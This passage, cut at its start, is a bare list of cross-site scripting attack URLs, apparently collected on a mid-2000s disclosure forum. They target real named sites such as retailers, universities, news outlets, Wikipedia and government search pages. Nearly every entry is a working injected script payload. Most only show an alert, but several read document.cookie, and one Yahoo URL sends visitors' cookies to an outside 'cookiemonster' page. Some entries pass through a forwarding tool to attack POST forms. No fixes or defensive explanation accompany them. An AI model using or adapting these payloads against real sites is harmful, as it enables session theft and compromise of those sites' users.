3%2c83))%2f%2f%5c'%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%22%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%5c%22%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%3e%3c%2fSCRIPT%3e!--%3cSCRIPT%3ealert(String.fromCharCode(88%2c83%2c83))%3c%2fSCRIPT%3e%3d%26%7b%7d&hasfield_heightinches='%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%5c'%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%22%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%5c%22%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%3e%3c%2fSCRIPT%3e!--%3cSCRIPT%3ealert(String.fromCharCode(88%2c83%2c83))%3c%2fSCRIPT%3e%3d%26%7b%7d&weightgoal='%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%5c'%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%22%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%5c%22%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%3e%3c%2fSCRIPT%3e!--%3cSCRIPT%3ealert(String.fromCharCode(88%2c83%2c83))%3c%2fSCRIPT%3e%3d%26%7b%7d&hasfield_weightgoal='%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%5c'%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%22%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%5c%22%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%3e%3c%2fSCRIPT%3e!--%3cSCRIPT%3ealert(String.fromCharCode(88%2c83%2c83))%3c%2fSCRIPT%3e%3d%26%7b%7d&secure=1 http://www.goglle.com/g-common2BH.php?ppid=11364&PHPSESSID=3ab999c02a258d0cbaa6fa4d70d805a8&K=%22%3E%3Cscript%3Ealert(%22SEO4Dummies%22)%3C/script%3E http://www.salary.com/home/layoutscripts/homl_display.asp?searchtext=%22%3E%3Cscript%3Ealert(%22You%20should%20be%20making%20millions%22)%3C/script%3E&searchtype=1&referal=&origin=secheader&Action=Go&image1.x=0&image1.y=0 http://www.pg.com/en_US/products/care_pages/index.jhtml?channelCode=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://www.merck.com/mrksearch/SearchServlet?HeaderImage=&HeaderImageAlt=&qt=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://www.sogou.com/sohu?query=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&pid=sohu&rid=01001400&md=listTopics&name=%22%3Easdf&mode=0&sogouhome=&shuru=shou https://www.adwaresystems.com/AdClock6/servlet.Login?CURRENTPAGE=Login.jsp&LOGINPAGENAME=Login.jsp&command=logon&user=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&password= http://www.costco.com/Common/Search.aspx?whse=BC&topnav=&search=%3C%27/script%3E%3C%27script%3Ealert%28%22XSS%22%29%3C%27/script%3E&N=0&Ntt=%3C%27/script%3E%3C%27script%3Ealert%28%22XSS%22%29%3C%27/script%3E&cm_re=1-_-Top_Left_Nav-_-Top_search http://giftregistry.kmart.com/webapp/wcs/stores/servlet/GiftRegistrySearchResultsView?storeId=10151&catalogId=10051&maxResultsPerPage=10&maxResults=50&sortBy=4&startIndex=0&findSimilarMatches=&searchOtherRegistry=true&firstName=%22%3E%3CIMG%20SRC=%22%22%20onerror=alert(%22XSS%22)%3E&lastName=blah&externalId= http://www.michaels.com/art/online/search?pageNumber=1&channel=0&search=yes&keywords=--%3E%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&type=0&x=0&y=0 http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://giftregistry.kmart.com/webapp/wcs/stores/servlet/GiftRegistrySearchResultsView&storeId=10151&catalogId=10051&externalId=%22%3E%3CBODY%20onLoad%3D%22alert('xss')%22%3E http://search.ft.com/searchResults?queryText=%22));alert(%22XSS%22);//&x=0&y=0&javascriptEnabled=true http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://tmc.tippingpoint.com/TMC/SendUserName&emailaddress=1%3Cscript%3Ealert('xss')%3C/script%3E https://www.girlsgonewild.com/index.cfm?action=checkout.cartprocess&quantity_mode=absolute&item_mode_upsell=&item_code_upsell=&item_quantity_upsell=&OCcode=&shipping_option_id=2&Salutation=-----&firstname=&lastname=&email=&shipping_phone_areacode=&shipping_phone_prefix=&shipping_phone_linenumber=&shipping_address1=%22%3E%3Cscript%3Ealert(%22HaX0rz%20gone%20wild%22)%3C/script%3E&shipping_address2=&shipping_city=&shipping_state=&shipping_zip=&shipping_country_code=US&save=CHECK+OUT http://www.marketwatch.com/support/feedback.asp?siteid=asdf%22;alert(%22XSS%22);e=%22 http://search.hhs.gov/search?q=asdf%A2%BE%BCscript%BEalert(%A2XSS%A2)%BC/script%BE%BCx&Submit=Search&ie=&site=HHS&output=xml_no_dtd&client=HHS&lr=&proxystylesheet=HHS&oe=US-ASCII http://search.hhs.gov/search?output=xml&proxystylesheet=HHS%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://www.demonoid.com/redirect.php?url='> http://www.animelyrics.tv/subscribe.asp?name=applesauce&email=asdf%3Cscript%3Ealert%28%22You+have+XSS+here%22%29%3C%2Fscript%3E http://whitepages.med.harvard.edu/WhitePagesPublic.asp?task=mysearch&db=hms&Last_Name=%22%3E%3Cscript%3Ealert(%22Go%20To%20Stanford%22)%3C/script%3E%3Cx http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://cypress.csuchico.edu/APO/WebDocs/Directory/LookupLocation.asp&Building=25MST&Room=here%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E http://www.cornell.edu/print.cfm?page=http://www.google.com/local_url?q=http://maluc.sitesled.com/xss.html https://utdirect.utexas.edu/nlogon/vip/ogif.WBX?referring_url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20e=%22 http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://map.ais.ucla.edu/portal/site/UCLA/menuitem.cfbd3d7d013be6a5ec9b87105d66344a/%3fjavax.portlet.tpst=414a0e597bcc1105313b8c105d66344a_ws_MX&javax.portlet.prp_414a0e597bcc1105313b8c105d66344a_viewID=RESULT_SET_VIEW&javax.portlet.begCacheTok=token&javax.portlet.endCacheTok=token&eng=autonomyUCLA&qt=asdf%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&Submit.x=0&Submit.y=0&Submit=Search http://web.mit.edu/bin/cgicso?query=--%3E%3Cscript%3Ealert(%22Go%20to%20harvard%22)%3C/script%3E%3C!--x https://kb.berkeley.edu/cgi-bin/help_referral.pl?articleTitle=%3Cscript%3Ealert(%22Go%20to%20MIT%22)%3C/script%3E%3Cx http://search.caltech.edu/search?q=grandma%20porn!%3Cscript%3Ealert(%22Go%20to%20Berkeley%22)%3C/script%3E&site=Caltechweb&output=xml_no_dtd&client=Caltechweb&proxystylesheet=Caltechweb http://www.googlesyndicatedsearch.com/u/PrincetonNew?q=%22%3E%3Cscript%3Ealert(%22Go%20to%20UT%22)%3C/script%3E%3Cx http://www.alsa.org/print.cfm?title=%3C/title%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&URL=alsa%2Fleaders.cfm%3F%3Cscript%3Ealert(String.fromCharCode(88,83,83,50))%3C/script%3E http://www.cast.org/teachingeverystudent/ideas/print.cfm?name=Uh%20Oh%3Cscript%3Ealert(%22Uh%20Oh%22)%3C/script%3E&r_id=-1 http://www.furl.net/urlInfo.jsp?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx http://www.texassports.com/index.php?s=asdf%22%3E%3Cscript%3Ealert(%22A%20lot%20of%20alerts..%22)%3C/script%3E%3Cx&change_well_id=2&url_article_id=2406 http://bunnyherolabs.com/dhtml/monster.php?ref=javascript:alert%28%22XSS%22%29%3B http://www.ebgames.com/search.asp?Ntk=TitleKeyword&Ntx=mode%2Bmatchallpartial&Ntt=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&N=0&find.x=0&find.y=0 http://search.wn.com/?version=1&template=oil%2Findex.txt&search_string=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&language_id=-1&template=worldnews%2Findex.txt&action=search&first=0 http://www.texaco.com/?selectcountry=%22;alert(%22XSS%22);// http://ccbn.tenkwizard.com/filing.php?repo=tenk&ipage=3519814&doc=1&total=&attach=ON&TK=CVX&CK=0000093410&CN=ChevronTexaco+Corp.&FG=0&CK2=93410&FC=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&BK=FFFFFF&SC=ON&TC1=FFFFFF&TC2=FFFFFF http://search.sky.com/search/skynews/results?QUERY=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx&CID=30000&Submit.x=0&Submit.y=0 http://www.mtv.nl/homepage/artikel.php?article=%22%3E%3Cscript%3Ealert('XSS');%3C/script%3E%3C%22 http://www.cduniverse.com/sresult.asp?HT_Search_Info=%22%3E%3Cscript%3Ealert%28%27Tales+from+the+scripts...+XSS+rated%21%21%27%29%3B%3C%2Fscript%3E&HT_Search=TITLE&image.x=0&image.y=0&cart=423465202&style=ice&altsearch=yes http://ludimate.com/products/tilelander/highscores/addscore.php?code=B8CWTAG4U4&name=&location=Everywhere&country=US http://ludimate.com/products/tilelander/highscores/addscore.php?code=B8CWTAG4U4&name=%22%3E%3Cscript%3Ealert('Sla..ckers.org')%3C/script%3E&location=Everywhere&country=US http://www.randmcnally.com/rmc/search/srcStoreSearch.jsp?BV_SessionID=%40%40%40%401173383824.1163051748%40%40%40%40&BV_EngineID=ccceaddjfmfhlegcefecggfdffhdghh.0&txtSearch=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&x=0&y=0 http://www.ecoupons.com/users.php?username=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&email=&confirmemail=&fullname=&address1=&address2=&state=--&zipcode=&country=--&year=&sex=--&income=--&mode=create http://reg.imageshack.us/content.php?page=email&q=%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.nexopia.com/profile.php&requestType=query&requestParams http://www.stopwaste.org/lib/search.asp?index=F%3A%5Cwebsites%5CAlameda%5Csearch&stemming=&maxFiles=25&autoStopLimit=5000&sort=Hits&cmd=search&SearchForm=%25%25SearchForm%25%25&request=%22%3E%3Cscript%3Ealert%28%27Why+Oh+oh+why....+wasting%20your%20time%20on%20this%3F%27%29%3B%3C%2Fscript%3E%3C%22 http://www.nexopia.com/header.php?bodyname='%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3Cx http://www.nexopia.com/header.php?bodyname='%3E%3Cscript%3Eif(typeof%20q=='undefined')%7Balert('JustOnce')%7Dq=5%3C/script%3E%3Cx http://www.tritonhealth.com/cgi-bin/category.cgi?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E https://cm.rsaconference.com/US07/portal/startNewRegistration.ww?hasRegCode=no®CodeFormHidden=&zipFormHidden= https://cm.rsaconference.com/US07/portal/processCreateAccount.ww?password=&value%28profileValue_11088%29=XSS%22%3E%3Cscript%3Ealert(%22All%20your%20private%20keys%20are%20belong%20to%20me%5Cn%5Cn%22%2Bdocument.cookie)%3C/script%3E http://www.usenext.com/UseNextDE/ShopInt/misc/miscShowNewsgroups.cfm?SNUUID=CC8A8130-E00E-2063-874892F19C7A185D&1163072824024%22%3E%3Cscript%3Ealert(1)%3C/script%3E& http://www.dvdempire.com/Exec/v5_search_item.asp?userid=99365065948345&string=%22%3E%3Cscript%3Ealert%28%27hacker+safe%21%27%29%3B%3C%2Fscript%3E%3C%22&site_media_id=&site_id=4&pp=&used=0 http://www.goldnutritionstore.com/cgi-bin/category.cgi?query=%22%3E%3Cscript%3Ealert('H4cK0r%20Safe!!%20really,%20we%20truely%20are%20hacker%20safe,%20see%20the%20green%20logo.')%3C/script%3E%3C%22 http://www.computerworld.com/action/search.do?command=basicSearch&searchTerms=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&.x=0&.y=0 http://gallery.yahoo.com/error.php?e=--%3E%3Cscript%3Edocument.write('%3Ciframe%20src=http://scripts.sitesled.com/cookiemonster.html?'%2Bescape(document.cookie)%2B'%3Ehiya')%3C/script%3E%3Cx https://secure.fourseasons.com/secure/contact_us/gift_card_order_form.html?transaction_reference=&last_cc_number=&keyword=gift_card_order_form&contact_forms_link=141&contact_form_type=Hotel+Site&submission_counter=6&USD_100_cards=0&USD_250_cards=&USD_500_cards=&USD_1000_cards=&USD_2500_cards=&USD_5000_cards=&ship_method=domestic_express&USD_card_total=%240.00+US&USD_shipping=%240.00+US&USD_total=%240.00+US&cc_type=&cc_number=&cc_expiry=&email_confirmation=email_confirmation&email_address=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&billing_name_prefix=&billing_first_name=&billing_last_name=&billing_address_line_1=&billing_address_line_2=&billing_city=&billing_zip_or_postal_code=&billing_state_or_province=&billing_country=&billing_telephone_number=&billing_fax_number=&billing_mobile_number=&failed_email_address=&ship_to=same&enclosure_message=&enclosure_to=&enclosure_from=&verisign_result=&pobox_rejection=&success_message_redirect_action=&user_clicked_submit=true&field_meta_data_chart=%11USD+100+cards%10USD_100_cards%102%11USD+250+cards%10USD_250_cards%102%11USD+500+cards%10USD_500_cards%102%11USD+1000+cards%10USD_1000_cards%102%11USD+2500+cards%10USD_2500_cards%102%11USD+5000+cards%10USD_5000_cards%102%11Via%10ship_method%105%11Card+value+subtotal%10USD_card_total%1015%11Shipping%10USD_shipping%1015%11Credit+Card+will+be+charged%10USD_total%1015%11Credit+Card+Type%10cc_type%101%11Credit+Card+Number%10cc_number%102%11Credit+Card+Expiry%10cc_expiry%102%11Email+Confirmation%10email_confirmation%1015%11E-mail+Address%10email_address%102%11Prefix%10billing_name_prefix%102%11First+Name%10billing_first_name%102%11Last+Name%10billing_last_name%102%11Address+Line+1%10billing_address_line_1%102%11Address+Line+2%10billing_address_line_2%102%11City%10billing_city%102%11Zip+%2F+Postal+Code%10billing_zip_or_postal_code%102%11State+%2F+Province%10billing_state_or_province%102%11Country%10billing_country%101%11Telephone+Number%10billing_telephone_number%102%11Fax+Number%10billing_fax_number%102%11Mobile+Number%10billing_mobile_number%102%11Failed+E-mail+Address%10failed_email_address%1015%11Ship+to%10ship_to%105%11Prefix%10shipping_name_prefix%102%11First+Name%10shipping_first_name%102%11Last+Name%10shipping_last_name%102%11Address+Line+1%10shipping_address_line_1%102%11Address+Line+2%10shipping_address_line_2%102%11City%10shipping_city%102%11Zip+%2F+Postal+Code%10shipping_zip_or_postal_code%102%11State+%2F+Province%10shipping_state_or_province%102%11Country%10shipping_country%101%11Message%10enclosure_message%103%11To%10enclosure_to%102%11From%10enclosure_from%102%11Verisign+Result%10verisign_result%1015%11P.O.+Box+Rejection%10pobox_rejection%1015 http://www.opencores.org/search.cgi/do_search?query=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://realtravel.com/search-results.aspx?destid=0&run=true&from=home&q=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&submit.x=0&submit.y=0 http://shopping.discovery.com/stores/servlet/DirectEmailSignup?storeId=10000&langId=-1&catalogId=10000&email1=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&signupbutton.x=19&signupbutton.y=11 http://www.tv.com/science-fiction/genre/10/az.html?era=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&g=10&tag=genre_tabs;all http://www.test.com/servlet/com.test.servlet.account.Login?fromLogin=true&fromLogin=true&login=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&loginPassword=&logIntoPublicSite=true&groupLoginCode= http://www.adidas.com/scripts/cud/cud.asp?call=registeremail&Postprocessor=http://tinyurl.com/2tx&dateofbirth_dd=1&dateofbirth_mm=1&dateofbirth_yyyy=1 http://64.233.179.104/translate_c?hl=en&ie=UTF-8&oe=UTF-8&langpair=ar%7Cen&u=http://asdf.com/&prev=/language_tools http://www.imvu.com/catalog/web_request_help.php?problem_type=asdf%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.bevmo.com/productlist.asp?Ntt=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&Ntk=All&D=&Nty=1 http://www.bk.com/history.aspx?PageTitle=With%20a%20side%20of%20Sla.ckers.org%22);alert('xss');test=(%22 http://www.fkhalbe.net/gbuch/guestbook_changeentry.php?entry=%22%3Ch2%3Eomgwtfxss%3C/h2%3E http://db.ard.de/abc/CG.suchausgabe?p_buchstabe='%22%3C/title%3E%3Cscript%3Ealert(123)%3C/script%3E http://www.turkishdailynews.com.tr/article.php?enewsid=58929%22%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E http://www.ufc.com/index.cfm?fa=search.results&ss=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://fr.wikipedia.org/wiki/Special:Search?search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&go=Go http://nl.wikipedia.org/wiki/Special:Search?search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&go=Go http://ru.wikipedia.org/wiki/Special:Search?search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&go=Go http://www.wintotal.de/User/LogInOut.php?URL='%22%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://leaguez.yusho.de/?module=news'%22%3Cscript%3Ealert(123)%3C/script%3E http://www.genomics.sinica.edu.tw/index.php?t=13'%22%3E%3Cscript%3Ealert(123)%3C/script%3E&article_id=44 http://instantcontent.freenet.de/content.php?templ=1&Cat_id=9&design_id=4&FarbeTitel=FFFFFF&HFarbeTitel=3366FF&FarbeHeadlines=000099&HFarbeHeadlines=CCCCFF%3Ci%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C/i%3E%3Cbr%3E&FarbeRahmen=3366FF&Anzahl=5 http://www.counter-strike.de/content/cs16/spraylogos/index.php?seite=2'%22%3Cscript%3Ealert(123)%3C/script%3E http://www.cs-expert.de/cse_user_profil.php?m_id=1%22%3Cscript%3Ealert(123)%3C/script%3E http://www.planet.com.tw/product/product_dm.php?product_id=267&menu_id=15'%22%3E%3Cscript%3Ealert(123)%3C/script%3E http://www.whiteacid.org/misc/xss_headers.php?xss_target=http://www.hackr.org/yourinfo.php&referer= http://www.hackr.org/users.php?user=blasterX13%22%3E%3C/title%3E%3Cscript%3Ealert(1337)%3C/script%3E http://www.cbsnews.com/stories/2005/09/26/search/main886284.shtml?num=10&offset=0&source=story§ion=&type=all&sort=1&searchString=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&x=36&y=14 http://www.search.com/search?q=&q.lit=&q.or=&q.not=&q.lang=&q.ft=&q.age=&q.site=&q.link=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&q.related=&submit=Advanced+Search&adv=1&channel=1 http://search.oprah.com:7782/search/search_results.jsp?querystring=%3CSCRIPT%3Ealert('XSS')%3C/SCRIPT%3E&fromSearchPage=yes http://search.businessweek.com/AdvancedSearch?searchTerm=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&searchType=advanced&collection=www.pi&sortBy=relevance&fromDate=&toDate=&Author=&skin=BusinessWeek&x=17&y=11 http://www.findarticles.com/p/search?qt=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C/SCRIPT%3E&qf=all&qta=1&tb=art&x=0&y=0 http://newstrove.com/cgi-bin/search.pl?sa=0&search=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&go_button=Go&sn=0&sn_select=0&ft=1 http://www.coldwellbanker.com/servlet/SearchProperty?action=quickSearch&city=%3CSCRIPT%3Ealert('XSS')%3C/SCRIPT%3E http://yellowpages.superpages.com/listings.jsp?SRC=lycos2&CB=&R=N&STYPE=S&C=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&N=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&T=&S=&PS=15&search=Find+It http://castle.pricewatch.com/s/search.asp?s=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E http://www.whiteacid.org/misc/xss_headers.php?xss_target=http://www.hackr.org/yourinfo.php&sp=sp&db=bugtraq&search=%22%3E%3CBODY+onload%21%23%24%25%26%28%29*%7E%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Dalert%28%22DIGI7AL64%22%29%3E http://msgs.securepoint.com/cgi/AT-sp-search?sp=sp&db=bugtraq&search=%22%3E%3CBODY+onload%21%23%24%25%26%28%29*%7E%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Dalert%28%22XSS%22%29%3E http://msgs.securepoint.com/cgi/AT-sp-search?sp=sp&db=bugtraq&search=%22%3E%3CBODY+onload%3Dalert%28%22XSS%22%29%3E%3Cx http://www.whiteacid.org/misc/xss_headers.php?xss_target=http://www.hackr.org/yourinfo.php&sp=sp&db=bugtraq&search=%22%3E%3C/object%3E%3CBODY+onload%3Dalert%28%22DIGI7AL64%22%29%3E%3Cx http://hp.infonow.net/bin/findNow?CLIENT_ID=HP_LOC_CAN_SRV&PAGE=SearchFinal.html&PROD_DESC_NUM=6&HIDDEN_TIER_2_TEXT=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://www.careerbuilder.com/JobSeeker/Companies/CompanySearch.aspx?searchstring=%3CSCRIPT%3Ealert('XSS')%3C/SCRIPT%3E http://patft.uspto.gov/netacgi/nph-Parser?Sect1=PTO2&Sect2=HITOFF&u=%2Fnetahtml%2FPTO%2Fsearch-adv.htm&r=0&p=1&f=S&l=50&Query=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&d=PTXT http://www.medicinenet.com/script/main/srchcont.asp?src=%3cscript%3ealert%28%27xss%27%29%3c%2fscript%3e&op=mm http://focus-webapps.ti.com/general/docs/sitesearch/searchdevice.tsp?partNumber=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E http://www.riaaradar.com/search.asp?keyword=%3CSCRIPT%3Ealert('XSS')%3C/SCRIPT%3E http://www5.jcpenney.com/jcp/SearchDepartment.aspx?SearchString=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&submit+search.x=10&submit+search.y=14&JSEnabled=false&mscssid=643386687fc5a42b6825e1e2e8f4ff87fxMnVNoVza1oxMnVNoVza1W200BD16B7E276C82448D75A86FE35BEF2EE20631813&cmResetCat=true http://www.sears.com/sr/javasr/search.do?BV_UseBVCookie=Yes&vertical=Sears&keyword=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&gobutton.x=20&gobutton.y=15&gobutton=find http://search.money.cnn.com/pages/search.jsp?QueryText=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&search.x=34&search.y=9&magazine=web&source=money&query=&invocationType=search%252Ftop http://hd.net/movies_search_results.html?keyword=%3CSCRIPT%3Ealert('XSS')%3C%2FSCRIPT%3E&wheretosearch=title http://search.sportsillustrated.cnn.com/pages/search.jsp?query=%3CSCRIPT%3Ealert('XSS')%3C/SCRIPT%3E http://www.pcmall.com/pcmall/search/search.asp?partno= http://www.blockbuster.com/online/search/PerformKeyWordSearchAction?channel=Movies&subChannel=sub&keyword=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&x=20&y=15 http://movies.aol.com/search/dvdresults.adp?query=%3CSCRIPT%3Ealert('XSS')%3C/SCRIPT%3E http://www.anywho.com/qry/wp_fap?lastname=%3CSCRIPT%3Ealert('XSS')%3C/SCRIPT%3E http://query.nytimes.com/search/query?frow=0&n=10&srcht=s&query=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&srchst=nyt&submit.x=11&submit.y=9&submit=sub&hdlquery=&bylquery=&daterange=full&mon1=01&day1=01&year1=1981&mon2=11&day2=14&year2=2006 http://fr.wikipedia.org/wiki/Special:Search?search=%22%3C%3E%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&go=Go http://nl.wikipedia.org/wiki/Special:Search?search=%22%3C%3E%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&go=Go http://ru.wikipedia.org/wiki/Special:Search?search=%22%3C%3E%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&go=Go http://omfg.com/quickResults.asp?searchtype=D&radiobutton=radiobutton&searchfield=%3Cscript%3Ealert%28%22omfg+I+cant+believe+this+site+is+real%22%29%3C%2Fscript%3E&x=0&y=0 http://www.mapquest.com/maps/map.adp?searchtype=address&country=US&addtohistory=&searchtab=home&formtype=address&popflag=0&latitude=&longitude=&name=&phone=&level=&cat=&address=&city=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&state=&zipcode= http://vonage.com/help.php?search=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&x=0&y=0 http://www.hackaday.com/search/?q=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E http://www.computerworld.com/action/search.do?command=basicSearch&searchTerms=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&x=15&y=15 http://www.blogdigger.com/search.jsp?q=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&sortby=date http://www.dlink.com/search/?qry=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&x=9&y=10 http://search.ati.com/NAsearch.asp?rdoCatalog=NASite&Query=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&go.x=10&go.y=15&DefaultLanguage=16&Catalog=NASite&Start=&Total=&Stat=New http://www.oracle.com/pls/db102/print_hit_summary?search_string=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E http://www.netscape.com/search/?s=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E https://www.blackberry.com/ThirdParty/searchResults.jsp?q=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&x=24&y=14&partnertype=all&applicationtype=all&servicetype=all&verticalmarket=all&countrysupported=all&platformsupported=all&languagesupported=all http://search.chron.com/chronicle/search.do;jsessionid=a8wANAmcLZCf5skcO7?basicSearchFormComponent.resultsPerPage=10&basicSearchFormComponent.pageNum=1&basicSearchFormComponent.maxResults=1000&basicSearchFormComponent.mode=search&basicSearchFormComponent.booleanMode=false&basicSearchFormComponent.propertyGroup=CHRONICLE&basicSearchFormComponent.configName=basic&basicSearchFormComponent.siteName=Chronicle&basicSearchFormComponent.contextMode=false&basicSearchFormComponent.shadowSearchText=asdf%27e%22e%3Ee%3Ce&resultNavigationFormComponent.propertyGroup=CHRONICLE&resultNavigationFormComponent.configName=taxonomy&resultNavigationFormComponent.limitResults=0&iqlRulesFormComponent.configName=iql&iqlRulesFormComponent.processManualRules=true&iqlRulesFormComponent.processSponsoredRules=true&iqlRulesFormComponent.processConcepts=true&archiveSearchFormComponent.selectedInterval=7&archiveSearchFormComponent.selectedFromYear=2006&archiveSearchFormComponent.selectedToYear=2006&selectedSort=Date&basicSearchFormComponent.searchText=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&basicSearchFormComponent.selectedDatabaseNames=Everything http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://imdb.com/Character&char=asdf%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&gender=male&GO.x=10&GO.y=9&GO=search http://www.philipmorrisusa.com/en/search/search.asp?criteria=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&code=noResultsFound http://www.realtor.com/FCMA/UnsoldOnboard.asp?ac=0&poe=&ZipCode=11111&PType=1&CType=RDC.com&Onboard=false&strAddress=%3CSCRIPT%3Ealert('XSS')%3C/SCRIPT%3E&strCity=&strState=AL&strCustId=Invalid%20Zip%20Code&areaId=&poe=realtor http://wwwa.accuweather.com/canada-city-list.asp?postalcode=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&province=AB http://reports.internic.net/cgi/whois?whois_nic=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&type=domain http://www.wirelessweek.com/index.asp?layout=searchResults&content=all&text=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&submit.x=6&submit.y=14&submit=Submit http://www.anadarko.com/search.asp?terms=%20%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E http://smallbusiness.dnb.com/search-results.asp?name=test&city=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&state=AL&country=US http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://www.chevron.apply2jobs.com/index.cfm?fuseaction=mExternal.searchJobs&txtKeyword=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E http://www.roommateclick.com/error.asp?UID=&Room=0&msg=%3Cscript%3Ealert('ASL?');%3C/script%3E 